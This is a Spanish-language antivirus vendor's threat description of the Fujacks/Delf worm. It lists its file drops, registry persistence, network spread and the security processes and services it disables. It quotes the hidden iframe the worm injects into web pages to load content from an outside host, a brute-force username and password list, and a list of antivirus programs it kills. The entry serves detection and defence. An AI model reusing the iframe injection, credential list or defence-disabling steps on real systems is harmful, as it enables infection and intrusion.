TR/Proxy.Delf.CA - Trojan

Vea también

Resumen

Descripción completa

Estadísticas

Nombre:	TR/Proxy.Delf.CA
Descubierto:	26/02/2007
Tipo:	Gusano
En circulación (ITW):	Sí
Número de infecciones comunicadas:	Bajo
Potencial de propagación:	Medio
Potencial dañino:	Medio
Fichero estático:	Sí
Tamaño:	28.833 Bytes
Suma de control MD5:	916ede7e54c83f11f0f99f7e53178a3b
Versión del IVDF:	6.37.01.162

General Métodos de propagación:
   • Red local
   • Unidades de red mapeadas

Alias:
   • Mcafee: W32/Fujacks
   • Kaspersky: Worm.Win32.Delf.bd
   • F-Secure: Worm.Win32.Delf.bd
   • Sophos: W32/Fujacks-AU
   • Grisoft: Worm/Delf.AEP
   • Eset: Win32/Fujacks.O
   • Bitdefender: Win32.Worm.Fujacks.J

Plataformas / Sistemas operativos:
   • Windows 95
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003

Efectos secundarios:
   • Desactiva los programas de seguridad
   • Descarga ficheros
   • Suelta ficheros
   • Reduce las opciones de seguridad
   • Modificaciones en el registro

Ficheros Se copia a sí mismo en las siguientes ubicaciones:
   • %SYSDIR%\drivers\spoclsv.exe
   • \setup.exe

Añade secciones a los siguientes ficheros:
– Para: %todas las carpetas%\*.htm Con el siguiente contenido:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

De esta manera, renombra un fichero al reiniciar el sistema.
– Para: %todas las carpetas%\*.html Con el siguiente contenido:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– Para: %todas las carpetas%\*.asp Con el siguiente contenido:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– Para: %todas las carpetas%\*.php Con el siguiente contenido:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– Para: %todas las carpetas%\*.jsp Con el siguiente contenido:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– Para: %todas las carpetas%\*.aspx Con el siguiente contenido:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

Crea los siguientes ficheros:

– %todas las carpetas%\Desktop_.ini Este es un fichero de texto que no presenta riesgo alguno e incluye el siguiente contenido:
   • %fecha actual%

– \autorun.inf Este es un fichero de texto que no presenta riesgo alguno e incluye el siguiente contenido:
   •

Intenta descargar un fichero:

– La dirección es la siguiente:
   • http://www.baidu8.org/**********/xm.txt
This file may contain further download locations (es)

Registro La siguiente clave del registro se encuentra en un bucle infinito, añadido para ejecutar el proceso al reiniciar el sistema.

– [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   • %SYSDIR%\drivers\spoclsv.exe

Elimina del registro de Windows los valores de la siguiente clave:

– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   • RavTask
   • KvMonXP
   • kav
   • KAVPersonal50
   • McAfeeUpdaterUI
   • Network Associates Error Reporting Service
   • ShStatEXE
   • YLive.exe
   • yassistse

Modifica la siguiente clave del registro:

Varias opciones de configuración en Explorer:
– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   Valor anterior:
   • CheckedValue = %configuración definida por el usuario%
   Nuevo valor:
   • CheckedValue = 0

Infección en la red Para asegurar su propagación, el programa viral intenta conectarse a otros sistemas, tal como se describe a continuación.

Emplea la siguiente información de inicio de sesión para obtener el acceso al sistema remoto:

– El siguiente listado de nombres de usuario:
   • Administrator
   • Guest
   • admin
   • Root

– El siguiente listado de contraseñas:
   • 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
      shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
      12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
      654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
      database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
      123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
      110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
      administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
      temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
      Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100

Creación de direcciones IP:
Genera direcciones IP aleatorias, guardando solamente los primeros tres octetos de su propia dirección. Luego intenta establecer una conexión con las direcciones creadas.

Proceso de infección:
El fichero descargado será guardado en el ordenador afectado, bajo el nombre: %todas las carpetas compartidas%\GameSetup.exe

Ralentización:
– Crea el siguiente número de hilos de ejecución (instancias) infectados: 9
– Según su ancho de banda, podrá notar un descenso de velocidad en la red. Considerando que la actividad de este programa viral en la red es de nivel medio, es probable que ni siquiera la note si tiene una conexión de banda ancha.
– También se podría notar una leve ralentización debida a la creación de varios hilos de ejecución en la red.

Finalización de los procesos Listado de los procesos finalizados:
   • Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
      scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
      Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
      KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
      FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe

Processes containing the following window title (es)
   • Symantec AntiVirus
   • Duba
   • Windows
   • esteem procs
   • System Safety Monitor
   • Wrapped gift Killer
   • Winsock Expert

Listado de los servicios desactivados:
   • sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
      KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
      McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
      wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
      Symantec Core LC; NPFMntor; MskService; FireSvc

Datos del fichero Lenguaje de programación:
El programa de malware ha sido escrito en Delphi.

Programa de compresión de ejecutables:
Para agravar la detección y reducir el tamaño del fichero, emplea el siguiente programa de compresión de ejecutables:
• FSG

Para una breve descripción vea el resumen aquí.

Descripción insertada por Andrei Gherman el Thu, 19 Jun 2008 13:28 (GMT+1)
Descripción actualizada por Andrei Gherman el Thu, 19 Jun 2008 13:40 (GMT+1)

» About Malware
» About Phishing
» Viruses In the Wild

« volver